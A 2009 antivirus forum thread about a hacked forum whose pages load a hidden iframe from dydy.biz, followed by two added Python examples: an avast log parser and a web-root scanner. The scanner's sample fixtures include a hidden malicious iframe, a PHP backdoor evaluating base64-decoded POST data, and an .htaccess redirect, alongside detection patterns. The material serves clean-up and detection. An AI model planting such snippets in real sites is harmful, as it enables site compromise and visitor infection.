dydy.biz, what is it?

Good evening. I’m new on this forum and need help with a problem on my PC and on all PCs connecting to hxxp://www.decarider.com.
Yesterday evening we all received a message from AVAST saying:

“web protection: connection to virus site dydy.biz/in.cgi??20 blocked” ???

This affects only the forum of hxxp://www.decrider.com and not the gallery.

Can You tell me something about it?
Thank You very much!

Hi Snakebyte,

1 page without user’s consent downloaded and installed malicious software. The last time that malware was found by Google was on 2009-07-07.
Malicious software includes 5 scripting exploits, 3 trojans, 1 exploit.

Malcode was hosted on one domain, e.g.: smicrosoft.ru/.

This site was hosted on 1 network(s) including AS9800 (UNICOM).

Make the link you give there non-clickable by altering http to hxxp and/or www to wXw… we do not want the curious to get infected with live malware.

At the moment I get this: Empty source - Could not connect to site?
This could mean the site admins are working on it right now. You must understand that these injectors of malcode onto trusted, reputable sites, silently redirecting to malware download sites, have been active on a massive scale lately.

polonus

OK!
Thank You Polonus.

If it is only on the forum, then it is highly likely that the forum software is out of date and vulnerable to attack. This is the most common means of hacking sites: out-of-date content management software (PHP, SQL, etc.), and the forum uses both of those.

You will also have to be more specific about where the alert is and the malware name given, as I don’t get any alert in the forum using Firefox. Check the avast! Log Viewer (right-click the avast ‘a’ icon), Warning section; this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe

  • Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log

When posting URLs to suspect sites, change the http to hXXp so the link isn’t active (clickable) avoiding accidental exposure.

OK! I’ll remember to change http to hxxp.

I received, 1 hour ago, an alert message from avast about this link hxxp://masters-woodworks.com/valla.js{gzip} regarding a trojan.

This is the text of the log file from avast:

09/07/2009 22.06.33 SYSTEM 2028 Sign of “HTML:IFrame-HH [Trj]” has been found in “hxxp://masters-woodworks.com/valla.js{gzip}” file.
09/07/2009 20.25.04 SYSTEM 2028 Sign of “HTML:IFrame-HH [Trj]” has been found in “hxxp://masters-woodworks.com/valla.js{gzip}” file.
06/07/2009 15.40.14 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/06/2009 18.42.33 SYSTEM 1556 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
01/06/2009 22.08.08 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
01/06/2009 18.05.44 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
31/05/2009 12.32.35 SYSTEM 1572 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/05/2009 16.30.19 SYSTEM 1636 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
29/05/2009 8.34.36 SYSTEM 2032 Sign of “Win32:Gagent [Trj]” has been found in “C:\Documents and Settings\Snake\Documenti\Downloads\OziExplorer PCv3.95.4i +CEv1.12.3 working\OZI EXPLORER 3D 1.07 beta\ozi3d107b_patch.EXE” file.
28/05/2009 15.39.05 SYSTEM 2032 Sign of “VBS:Malware-gen” has been found in “hxxp://www.ilbuffer.com/Documenti/I%20Bug%20di%20Windows%20by%20Dangerous%20Spirit.txt” file.
28/05/2009 15.38.53 SYSTEM 2032 Sign of “VBS:Malware-gen” has been found in “hxxp://www.ilbuffer.com/Documenti/I%20Bug%20di%20Windows%20by%20Dangerous%20Spirit.txt” file.
26/05/2009 19.38.06 SYSTEM 2028 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
25/05/2009 6.23.10 SYSTEM 2036 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
21/05/2009 8.24.04 SYSTEM 2028 AAVM - scanning warning: x_AavmCheckFileDirectEx: hxxp://cdn.mirror.garr.it/mirror2/mirrors/ubuntu-releases/jaunty/ubuntu-9.04-desktop-amd64.iso (C:\WINDOWS\TEMP_avast4_\unp99692897.tmp) returning error, 00000084.
06/05/2009 15.15.17 SYSTEM 1628 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
26/04/2009 17.36.25 SYSTEM 2044 Function setifaceUpdatePackages() has failed. Return code is 0xC0000142, dwRes is C0000142.
17/04/2009 20.49.50 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
14/04/2009 22.48.49 SYSTEM 1632 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
08/04/2009 11.33.59 SYSTEM 1628 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/03/2009 6.57.07 SYSTEM 1960 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
29/03/2009 17.15.22 SYSTEM 2032 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
28/03/2009 19.22.40 SYSTEM 1968 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
27/03/2009 10.51.56 SYSTEM 2000 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
06/03/2009 20.23.53 SYSTEM 2024 Sign of “Win32:Trojan-gen {Other}” has been found in “I:\Razor1911\rzr-crys.exe” file.
27/02/2009 18.10.45 SYSTEM 1608 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
27/02/2009 13.59.54 SYSTEM 1608 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
21/02/2009 17.50.26 SYSTEM 1560 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
18/02/2009 6.49.01 SYSTEM 1616 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
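The Warning.log excerpt above mixes real detections with unrelated update failures and scanner warnings, and the later question in the thread is which hosts the detections actually point at. The following is an added example (not avast code, not from any poster) that parses lines in the format shown above, keeps only the "Sign of … has been found in …" entries, and groups them by host so that "is there any alert for decarider.com?" becomes a one-line check. The sample log is constructed from the format of the posted entries (paths shortened); the hxxp defanging is undone only for host extraction.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in the avast! 4 Warning.log line format shown in the thread
# (date time account pid message); not a real log.
SAMPLE_LOG = """\
09/07/2009 22.06.33 SYSTEM 2028 Sign of "HTML:IFrame-HH [Trj]" has been found in "hxxp://masters-woodworks.com/valla.js{gzip}" file.
06/07/2009 15.40.14 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
29/05/2009 8.34.36 SYSTEM 2032 Sign of "Win32:Gagent [Trj]" has been found in "C:\\Documents and Settings\\Snake\\Downloads\\patch.EXE" file.
28/05/2009 15.39.05 SYSTEM 2032 Sign of "VBS:Malware-gen" has been found in "hxxp://www.ilbuffer.com/Documenti/I%20Bug.txt" file.
21/05/2009 8.24.04 SYSTEM 2028 AAVM - scanning warning: x_AavmCheckFileDirectEx: hxxp://cdn.mirror.garr.it/ubuntu.iso (C:\\WINDOWS\\TEMP_avast4_\\unp.tmp) returning error, 00000084.
"""

# Common prefix of every line: dd/mm/yyyy h.mm.ss ACCOUNT PID <message>
LINE_RE = re.compile(
    r'^(?P<date>\d{2}/\d{2}/\d{4}) (?P<time>\d{1,2}\.\d{2}\.\d{2}) '
    r'(?P<user>\S+) (?P<pid>\d+) (?P<msg>.*)$'
)
# Detection message; straight and curly quotes both accepted (forum pasting curls them)
DETECTION_RE = re.compile(
    r'^Sign of ["\u201c](?P<sig>[^"\u201d]+)["\u201d] has been found in '
    r'["\u201c](?P<where>[^"\u201d]+)["\u201d] file\.$'
)


def location_host(where):
    """Host of a URL location (hxxp defanging accepted), or None for a local path."""
    refanged = re.sub(r'^hxx(ps?://)', r'htt\1', where, flags=re.I)
    parts = urlsplit(refanged)
    if parts.scheme.lower() in ('http', 'https') and parts.hostname:
        return parts.hostname.lower()
    return None


def parse_warning_log(text):
    """Split log text into (detections, other_lines).

    detections: list of dicts with date, time, pid, signature, location, host.
    other_lines: update failures, scanner warnings and anything unparsable,
    kept so nothing is silently dropped.
    """
    detections, other = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        d = DETECTION_RE.match(m.group('msg')) if m else None
        if d is None:
            other.append(line)
            continue
        where = d.group('where')
        detections.append({
            'date': m.group('date'), 'time': m.group('time'), 'pid': int(m.group('pid')),
            'signature': d.group('sig'), 'location': where, 'host': location_host(where),
        })
    return detections, other


def summarize_by_host(detections):
    """Map host (or '<local file>') -> list of signature names hit there."""
    summary = defaultdict(list)
    for d in detections:
        summary[d['host'] or '<local file>'].append(d['signature'])
    return dict(summary)


def hosts_seen(detections):
    """Sorted, de-duplicated list of remote hosts that triggered the Web Shield."""
    return sorted({d['host'] for d in detections if d['host']})


if __name__ == '__main__':
    dets, other = parse_warning_log(SAMPLE_LOG)
    for host, sigs in summarize_by_host(dets).items():
        print(f'{host}: {sigs}')
    print('remote hosts:', hosts_seen(dets))
    print('alert for decarider.com?', 'decarider.com' in hosts_seen(dets))
    print(f'{len(other)} non-detection lines ignored')
```

Run it against the real file by replacing `SAMPLE_LOG` with `open(path, encoding='cp1252', errors='replace').read()`; the 4.x log is a single-byte Windows code page, not UTF-8. On the sample, the masters-woodworks.com and ilbuffer.com hits come back as remote hosts while the Gagent hit is a local file, and no line mentions decarider.com, matching the observation made further down the thread.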

It’s strange that none of the alerts in the log are for decarider.com.

I see now why I’m not getting an alert in Firefox: I also use the NoScript add-on, and even though I allowed decarider.com in NoScript, I have it set to block iframes even so. I now see the NoScript blocking of the iframe in the forums, see image 2.

See image one, the decarider.com home page: there is no iframe tag.

I have checked the page source of the forum home page and there is no iframe tag, nor, as far as I can see, a script tag that could generate an iframe tag. So effectively what this means is that the iframe tag is being injected by the forum software XBM when the page is created. So it looks like the forum software is being exploited, i.e. the site has been hacked.

I am having the exact same problem at hxxp://doctorshealthforum.org. I have scanned my site multiple times and it says there is no virus. What is avast seeing that all the other antivirus software is not seeing?

What can I do to fix this dydy.biz/in.cgi?20 malicious site error?

Is it Malware? Can anyone see a problem at the site?

Thanks In advance for any help.

The site has been hacked; the forum software appears to be being exploited and an iframe is inserted into the page, see image 1. This tries to run a script on the dydy.biz site.

The dydy.biz site is on the avast malicious site list (it is a Russian Federation registered domain), so avast alerts and blocks the attempt to get to this site and run the script. I use Firefox with NoScript, which blocks that iframe from running, which is another level of protection.

If I try to reach dydy.biz directly then avast blocks it and I get a pop-up from both Firefox and the Network Shield blocking the malicious site, images 2 & 3.

How can I get rid of the IFrame and make sure they don’t hack it again?

You need to update the forum software and check any other content management software (PHP, SQL, WordPress, etc.) and ensure it is also up to date, and change all associated passwords.

Commonly this is in the template pages, but I don’t know how your site is put together or what software it uses. The problem is the pages are created by the forum software, and when viewing them with the view page source function in the browser, you don’t see the iframe tag that is being inserted.

The only reason you know it is there is when using Firefox with NoScript (with iframes blocked), as this shows a placeholder where the iframe would have been. Then there is avast blocking access to the site which is contained within the iframe.

I would say you need to speak with your host also and see if they can come up with a plan so that they/you can close the vulnerabilities that allow the site to be hacked.

  • This is commonly down to old content management software being vulnerable; see this example of a host’s response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any “default.aspx” or “default.cfm” pages as those are popular targets too.

  2. Remove any “rogue” files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load redirects into them.

  4. Change all passwords for that end user account: the cp password, the ftp password, and any ftp sub-accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
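Steps 1 to 3 of the host’s clean-up list (injected JavaScript or iframes in index and template pages, rogue PHP scripts, redirects planted in .htaccess) are exactly the things that a site owner’s "no virus found" scan tends to miss, because a desktop antivirus does not read server-side PHP or .htaccess. The following is an added example, not from any poster or from avast, of a triage script for a copy of the web root: it flags hidden or off-site iframes and obfuscated inline scripts in HTML/PHP/template files, `eval(...)` fed by `base64_decode`/`gzinflate`/request parameters in PHP files, dot-prefixed PHP files, and `RewriteRule`/`Redirect`/`ErrorDocument` lines in .htaccess that point to a host the site does not own. The sample web root it builds in a temporary directory is constructed for the demonstration (the dydy.biz URL is the one reported in this thread; `www.example.com` stands in for the victim site), and the indicator lists are a starting point, not a complete signature set.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Constructed sample web root: one injected index page, one legitimate iframe,
# one rogue PHP backdoor, one hijacked .htaccess and one harmless one.
SAMPLE_SITE = {
    'index.php': '<html><body><h1>Forum</h1>\n'
                 '<iframe src="http://dydy.biz/in.cgi?20" width="1" height="1" style="visibility:hidden"></iframe>\n'
                 '</body></html>',
    'about.html': '<html><body><iframe src="/embed/map.html" width="400" height="300"></iframe></body></html>',
    'images/.cache.php': '<?php eval(base64_decode($_POST["c"])); ?>',
    '.htaccess': 'RewriteEngine On\nRewriteCond %{HTTP_REFERER} google [NC]\n'
                 'RewriteRule .* http://dydy.biz/in.cgi?20 [R,L]\n',
    'forum/.htaccess': 'Options -Indexes\n',
}

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
SCRIPT_RE = re.compile(r'<script\b([^>]*)>(.*?)</script>', re.I | re.S)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')
HIDDEN_RE = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none', re.I)
OBFUSCATED_JS_RE = re.compile(r'\beval\s*\(|unescape\s*\(|String\.fromCharCode|document\.write\s*\(', re.I)
# eval() whose argument is decoded/inflated data or comes straight from the request
PHP_BACKDOOR_RE = re.compile(r'\beval\s*\(.*?(base64_decode|gzinflate|str_rot13|\$_(?:POST|GET|REQUEST|COOKIE))', re.I | re.S)
HTACCESS_RE = re.compile(r'^\s*(RewriteRule|Redirect(?:Match)?|ErrorDocument)\s+.*?(https?://\S+)', re.I)
HTML_EXT = ('.php', '.phtml', '.html', '.htm', '.tpl')


def external_host(url, own_hosts):
    """Host of an absolute URL if it is not one of the site's own hosts, else None."""
    host = (urlsplit(url).hostname or '').lower()
    return host if host and host not in own_hosts else None


def scan_html(text, own_hosts):
    """Findings for one page body: hidden/tiny/off-site iframes, off-site or obfuscated scripts."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        src = attrs.get('src', '')
        ext = external_host(src, own_hosts)
        tiny = attrs.get('width') in ('0', '1') or attrs.get('height') in ('0', '1')
        hidden = bool(HIDDEN_RE.search(m.group(1)))
        if ext or tiny or hidden:
            findings.append(('iframe', f'src={src} external={bool(ext)} tiny={tiny} hidden={hidden}'))
    for m in SCRIPT_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        src = attrs.get('src', '')
        if external_host(src, own_hosts):
            findings.append(('script-src', src))
        elif OBFUSCATED_JS_RE.search(m.group(2)):
            findings.append(('obfuscated-js', m.group(2).strip()[:80]))
    return findings


def scan_site(root, own_hosts):
    """Walk a web root and return (relative_path, kind, detail) triples."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob('*') if p.is_file()):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors='replace')
        name = path.name.lower()
        if name == '.htaccess':
            for line in text.splitlines():
                m = HTACCESS_RE.match(line)
                if m and external_host(m.group(2), own_hosts):
                    findings.append((rel, 'htaccess-redirect', line.strip()))
            if re.search(r'auto_(prepend|append)_file', text, re.I):
                findings.append((rel, 'htaccess-prepend', 'php auto_prepend/append_file set'))
            continue
        if name.endswith(('.php', '.phtml')):
            if PHP_BACKDOOR_RE.search(text):
                findings.append((rel, 'php-backdoor', 'eval() of decoded or request-supplied data'))
            if name.startswith('.'):
                findings.append((rel, 'hidden-php-file', 'dot-prefixed PHP file'))
        if name.endswith(HTML_EXT):
            findings.extend((rel, kind, detail) for kind, detail in scan_html(text, own_hosts))
    return findings


def write_sample_site(root):
    for rel, body in SAMPLE_SITE.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)


def demo(own_hosts=frozenset({'www.example.com', 'example.com'})):
    """Build the constructed web root in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix='webroot-')
    write_sample_site(root)
    return scan_site(root, set(own_hosts))


if __name__ == '__main__':
    for rel, kind, detail in demo():
        print(f'{rel:20} {kind:18} {detail}')
```

`scan_html` can also be run on the HTML the server actually returns (fetched with curl and saved to a file), which is the check this thread needed: a forum that builds pages from templates plus database content will show the injected iframe in the served page even when the template files on disk look clean, and anything injected only into the database (a post, a footer setting) will not appear in a file scan at all. Treat every hit as a lead to verify by hand, and remember that the script finds symptoms, not the outdated forum software or stolen FTP password that let them in.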